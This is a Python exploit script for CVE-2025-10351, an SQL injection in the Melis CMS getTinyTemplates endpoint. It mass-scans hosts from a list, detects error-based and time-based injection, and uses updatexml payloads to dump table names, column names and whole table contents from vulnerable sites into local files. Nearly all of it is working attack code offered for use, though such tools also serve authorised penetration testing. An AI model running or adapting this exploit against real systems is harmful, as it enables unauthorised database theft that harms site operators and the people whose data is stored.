#!/usr/bin/env python3 #===========================================================================================# # _______ ________ ___ ___ ___ _____ __ ___ ____ _____ __ # # / ____\ \ / / ____| |__ \ / _ \__ \| ____| /_ |/ _ \___ \| ____/_ | # # | | \ \ / /| |__ ______ ) | | | | ) | |__ ______| | | | |__) | |__ | | # # | | \ \/ / | __|______/ /| | | |/ /|___ \______| | | | |__ <|___ \ | | # # | |____ \ / | |____ / /_| |_| / /_ ___) | | | |_| |__) |___) || | # # \_____| \/ |______| |____|\___/____|____/ |_|\___/____/|____/ |_| # # # # # # Made with love for the hacking community <3 Manuel Iván San Martín Castillo # #===========================================================================================# import requests import argparse import html import time import urllib3 import concurrent.futures from colorama import Fore, Style, init from prettytable import PrettyTable from urllib.parse import urlparse, urlsplit, parse_qs, urlunsplit from bs4 import BeautifulSoup # Disable SSL warnings for self-signed certs urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Initialize color output init(autoreset=True) # Toggle debug details for requests/responses in make_petition DEBUG_REQ = False def remove_html_tags(text): """Remove all HTML tags from a given string using BeautifulSoup.""" return BeautifulSoup(text, "html.parser").get_text() def is_time_based_sqli(session, url, payload_true, payload_false, sleep_time, threshold=0.9): """Check for time-based SQL injection by measuring response time differences using a session.""" try: false_start = time.time() session.get(url + requests.utils.requote_uri(payload_false), timeout=sleep_time + 5) false_duration = time.time() - false_start true_start = time.time() session.get(url + requests.utils.requote_uri(payload_true), timeout=sleep_time + 5) true_duration = time.time() - true_start delay = true_duration - false_duration return delay >= (sleep_time * threshold) except requests.exceptions.Timeout: return True except Exception: return False def check_endpoint(host, port, endpoint, cookie, proxy_str=None, disable_verify=False): """ Main logic to check if a given endpoint is vulnerable to SQLi. Uses a requests.Session so cookie/headers persist across exploitation requests. proxy_str and disable_verify are passed so recursion keeps same settings. """ base_url = f"{host}:{port}" endpoint_with_quote = endpoint.replace("=", "='") url_with_quote = f"{base_url}/{endpoint_with_quote}" try: headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" } cookies = {"PHPSESSID": cookie} if cookie else {} # Use a session to keep cookies and headers consistent across all requests session = requests.Session() session.headers.update(headers) if cookies: session.cookies.update(cookies) # Apply proxy and TLS behavior (explicit, no env) if proxy_str: session.proxies = {"http": proxy_str, "https": proxy_str} session.trust_env = False # session.verify respects disable_verify flag session.verify = False if disable_verify else True # initial check - follow redirects so we can spot login pages response = session.get(url_with_quote, allow_redirects=True, timeout=5) # Authentication required detection: # if there was a redirect to login, response.history will be non-empty or response.url will differ if not args.url_list and (response.history or (response.url and response.url != url_with_quote)): print(f"{base_url} {Fore.YELLOW}[AUTH REQUIRED]{Style.RESET_ALL}") new_cookie = ask_for_cookies() if new_cookie and len(new_cookie) >= 8: return check_endpoint(host, port, endpoint, new_cookie, proxy_str, disable_verify) elif new_cookie: print(f"{base_url} {Fore.BLUE}[INVALID COOKIE]{Style.RESET_ALL}") return # Error-based SQLi detection (look for MySQL error or xpath syntax error triggered by updatexml) if "You have an error in your SQL syntax" in response.text or "xpath" in response.text.lower(): print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Error-Based SQLi") if args.all_tables or args.table: ask_to_exploit(f"{base_url}/{endpoint}", session) else: base = f"{base_url}/" # True delay payload (sleep happens) payload_true = endpoint.replace( "=", f"=1 AND (SELECT 1 FROM (SELECT(SLEEP({int(args.sleep)})))test)" ) # False payload (no delay) payload_false = endpoint.replace( "=", "=1 AND (SELECT 1 FROM (SELECT(1))test)" ) if is_time_based_sqli(session, base, payload_true, payload_false, args.sleep): print(f"{base_url} {Fore.RED}[VULNERABLE]{Style.RESET_ALL} Time-Based SQLi") print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} WARNING: Time-Based exploitation is not supported.") else: print(f"{base_url} {Fore.GREEN}[NOT VULNERABLE]{Style.RESET_ALL}") except requests.exceptions.SSLError: print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} SSL Error") except requests.exceptions.ConnectionError: print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} Connection Error") except Exception as e: print(f"{base_url} {Fore.YELLOW}[X]{Style.RESET_ALL} General Error: {e}") def process_url_list(file_path, endpoint, cookie, proxy_str=None, disable_verify=False): """Read URLs/hosts from a file and test each one individually (robust input + concurrency).""" try: seen = set() targets_all = [] with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: for line in f: line = line.strip() # Skip empties & comments if not line or line.startswith("#"): continue targets = [] # Case 1: full URL with scheme if "://" in line: parsed = urlparse(line) scheme = parsed.scheme.lower() if parsed.scheme else "http" host = parsed.hostname port = parsed.port if parsed.port else (443 if scheme == "https" else 80) if not host: continue full_host = f"{scheme}://{host}" targets.append((full_host, str(port))) else: # Case 2/3: host, ip, host:port, ip:port (no scheme) parsed = urlparse(f"//{line}") host = parsed.hostname port = parsed.port if not host: continue if port: tls_ports = {443, 8443, 9443, 10443} scheme = "https" if port in tls_ports else "http" targets.append((f"{scheme}://{host}", str(port))) else: targets.append((f"https://{host}", "443")) targets.append((f"http://{host}", "80")) # Dedup + collect for full_host, port in targets: key = (full_host, port) if key in seen: continue seen.add(key) targets_all.append((full_host, port)) if not targets_all: print(f"[{Fore.YELLOW}!{Style.RESET_ALL}] URL list is empty or no valid targets found.") return # Concurrency (threads): simple and effective for I/O (requests) max_workers = 20 # sube/baja si quieres; 20 suele ir fino sin reventar nada with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as ex: futures = [ ex.submit(check_endpoint, full_host, port, endpoint, cookie, proxy_str, disable_verify) for (full_host, port) in targets_all ] # Consume results to surface exceptions (if any) for fut in concurrent.futures.as_completed(futures): try: fut.result() except Exception as e: print(f"[{Fore.YELLOW}X{Style.RESET_ALL}] Worker error: {e}") except Exception as e: print(f"[{Fore.RED}ERROR{Style.RESET_ALL}] Failed to process URL list: {e}") def ask_to_exploit(url, session): """Ask user if they want to exploit an identified SQLi vulnerability. Pass session so exploitation uses same cookies.""" choice = input(f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Do you want to attempt exploitation? (y/n): ").strip().lower() if choice in ('y', 'yes'): exploit_error_based(url, args.sleep, session) else: print(f"[{Fore.BLUE}X{Style.RESET_ALL}] Exploitation aborted.") def ask_for_cookies(): """Ask the user to input a PHPSESSID cookie value for rechecking.""" choice = input(f"[{Fore.MAGENTA}?{Style.RESET_ALL}] Recheck with cookies? (y/n): ").strip().lower() if choice in ('y', 'yes'): return input(f"[{Fore.YELLOW}-{Style.RESET_ALL}] Enter PHPSESSID cookie: ").strip() return None def make_petition(session, url, payload_template, sleep_time, output_file, data_type): """ Robust petition with improved extraction reliability. Guarantees that even single results like '~changelog~' are printed. """ if output_file and output_file.lower() != 'null': open(output_file, 'w').close() extracted_rows = [] no_data_counter = 0 parsed = urlsplit(url) param_name = None base_for_request = url if parsed.query: qs = parse_qs(parsed.query) if qs: param_name = list(qs.keys())[0] base_for_request = urlunsplit((parsed.scheme, parsed.netloc, parsed.path, '', '')) else: if '=' in url and url.rstrip().endswith('='): idx = url.rfind('=') last_part = url[:idx].split('/')[-1] param_name = last_part if last_part else 'id' base_for_request = url[:idx+1].rstrip('=') use_params = bool(param_name) for offset in range(0, 100): CHAIN = "" ITERATOR = 1 ended = False data_fragment = "" while True: payload = payload_template.format(ITERATOR=ITERATOR, OFFSET=offset) try: if use_params: params = {param_name: payload} if DEBUG_REQ: print(f"[DEBUG] GET {base_for_request} params={params}") response = session.get(base_for_request, params=params, allow_redirects=False, timeout=3) else: exploit_url = url + requests.utils.requote_uri(payload) if DEBUG_REQ: print(f"[DEBUG] GET {exploit_url}") response = session.get(exploit_url, allow_redirects=True, timeout=3) if DEBUG_REQ: print(f"[DEBUG] status={response.status_code} url={response.url}") snippet = response.text[:800].replace("\n", "\\n") print(f"[DEBUG] resp snippet: {snippet}") response_text = html.unescape(remove_html_tags(response.text)) lines = response_text.splitlines() found_data = False for line in lines: if "xpath" in line.lower(): # Detect data between ~ ~ if "~" in line: extracted = line.split("~") if len(extracted) > 1: data_fragment = extracted[1].split("'")[0] if "'" in extracted[1] else extracted[1] elif ":" in line: data_fragment = line.split(":")[-1].strip() else: data_fragment = line.strip() if data_fragment: found_data = True CHAIN += data_fragment if DEBUG_REQ: print(f"[DEBUG] extracted fragment: '{data_fragment}'") if found_data: no_data_counter = 0 else: no_data_counter += 1 if no_data_counter >= 5: break ITERATOR += 31 time.sleep(sleep_time) except requests.RequestException as e: if DEBUG_REQ: print(f"[DEBUG] request exception: {e}") break # 🔧 NEW: ensure we don’t lose single results if not CHAIN and data_fragment: CHAIN = data_fragment if CHAIN: extracted_rows.append(CHAIN) print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Extracted {data_type}: {Fore.BLUE}{CHAIN}{Style.RESET_ALL}") if output_file and output_file.lower() != 'null': with open(output_file, 'a') as f: f.write(CHAIN + '\n') print(f"\n[{Fore.RED}X{Style.RESET_ALL}] Finished extraction process.\n") return extracted_rows def display_table(data_list, columns, output_file): """Display extracted data in a nicely formatted table.""" print(f"[{Fore.GREEN}+{Style.RESET_ALL}] Table with data") table = PrettyTable() table.field_names = columns for index, row in enumerate(data_list): row_data = row.split("||") if len(row_data) == len(columns): table.add_row(row_data) if index < len(data_list) - 1: table.add_divider() print(table) if output_file and output_file.lower() != 'null': with open(output_file, 'a') as f: f.write(str(table) + '\n') def extract_tables(session, url, sleep_time, tables_filename): """Extract all table names in the current database.""" payload_template = ( "1 OR updatexml(null, concat(0x7e, " "(SELECT substring(table_name, {ITERATOR}, 32) " "FROM information_schema.tables WHERE table_schema=database() " "LIMIT 1 OFFSET {OFFSET}), 0x7e), null)" ) make_petition(session, url, payload_template, sleep_time, tables_filename, 'table') def extract_columns(session, url, sleep_time, table_name): """Extract all column names from a specific table.""" print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting columns from table: {table_name}") payload_template = ( f"1 OR updatexml(null, concat(0x7e, " f"(SELECT substring(column_name, {{ITERATOR}}, 32) " f"FROM information_schema.columns WHERE table_name='{table_name}' " f"LIMIT 1 OFFSET {{OFFSET}}), 0x7e), null)" ) return make_petition(session, url, payload_template, sleep_time, 'null', 'column') def extract_data_from_columns(session, url, sleep_time, table_name, columns): """Extract data from specified columns in a table.""" parsed_url = urlparse(url) base_url = f"{parsed_url.scheme}://{parsed_url.netloc}" column_list = columns.split(',') columns_combined = ", 0x7c7c, ".join(column_list) payload_template = ( f"1 OR updatexml(null, concat(0x7e, " f"(SELECT substring(concat({columns_combined}), {{ITERATOR}}, 32) " f"FROM {table_name} LIMIT 1 OFFSET {{OFFSET}}), 0x7e), null)" ) print(f"{Fore.BLUE}i{Style.RESET_ALL} Extracting data from {base_url}") extracted_data = make_petition(session, url, payload_template, sleep_time, f"{table_name}_data.txt", 'data') if extracted_data: display_table(extracted_data, column_list, f"{table_name}_data.txt") def exploit_error_based(url, sleep_time, session): """Main handler for exploiting via error-based SQL injection. Uses session passed from check_endpoint.""" print(f"{Fore.BLUE}i{Style.RESET_ALL} Attempting Error-Based SQL Injection on {url}") print(f"{Fore.YELLOW}!{Style.RESET_ALL} WARNING: Large data may not extract properly") if args.all_tables: extract_tables(session, url, sleep_time, "tables_extracted.txt") elif args.table: if args.all_columns: columns = extract_columns(session, url, sleep_time, args.table) if columns: extract_data_from_columns(session, url, sleep_time, args.table, ",".join(columns)) elif args.columns: extract_data_from_columns(session, url, sleep_time, args.table, args.columns) else: extract_columns(session, url, sleep_time, args.table) if __name__ == "__main__": usage_message = "CVE-2025-10351.py -u -p | -l [-s ] [-at] [-t ] [-ac]" parser = argparse.ArgumentParser(usage=usage_message, add_help=False, description="Script to check and exploit CVE-2025-10351.") parser.add_argument("-u", "--url", help="Target URL (e.g. https://www.example.com)") parser.add_argument("-p", "--port", help="Port (e.g. 80, used only with --url)") parser.add_argument("-l", "--url-list", help="File with URLs to check (one per line)") parser.add_argument("-s", "--sleep", type=float, default=1.0, help="Sleep time (default: 1s)") parser.add_argument("-at", "--all-tables", action='store_true', help="Extract all tables.") parser.add_argument("-t", "--table", help="Specify a table name to extract columns.") parser.add_argument("-ac", "--all-columns", action='store_true', help="Extract all column data (requires -t).") parser.add_argument("-c", "--columns", help="Specify columns to extract (comma-separated).") parser.add_argument("--proxy", help="Proxy URL (no env). Example: http://127.0.0.1:8080") parser.add_argument("--insecure", action="store_true", help="Disable TLS verification (useful for intercepting HTTPS with Burp)") parser.add_argument("--cookie", help="PHPSESSID cookie (optional). Example: abc123") parser.add_argument("--debug", action="store_true", help="Enable verbose request/response debug for extraction") parser.add_argument("-h", "--help", action='help', default=argparse.SUPPRESS, help="Show help message.") args = parser.parse_args() # enable debug if requested if args.debug: DEBUG_REQ = True endpoint = "melis/MelisCms/PageEdition/getTinyTemplates?idPage=" # Accept optional cookie via CLI cookie_arg = args.cookie or "" if args.url and args.port: check_endpoint(args.url, args.port, endpoint, cookie_arg, args.proxy, args.insecure) elif args.url_list: process_url_list(args.url_list, endpoint, cookie_arg, args.proxy, args.insecure) else: parser.print_help()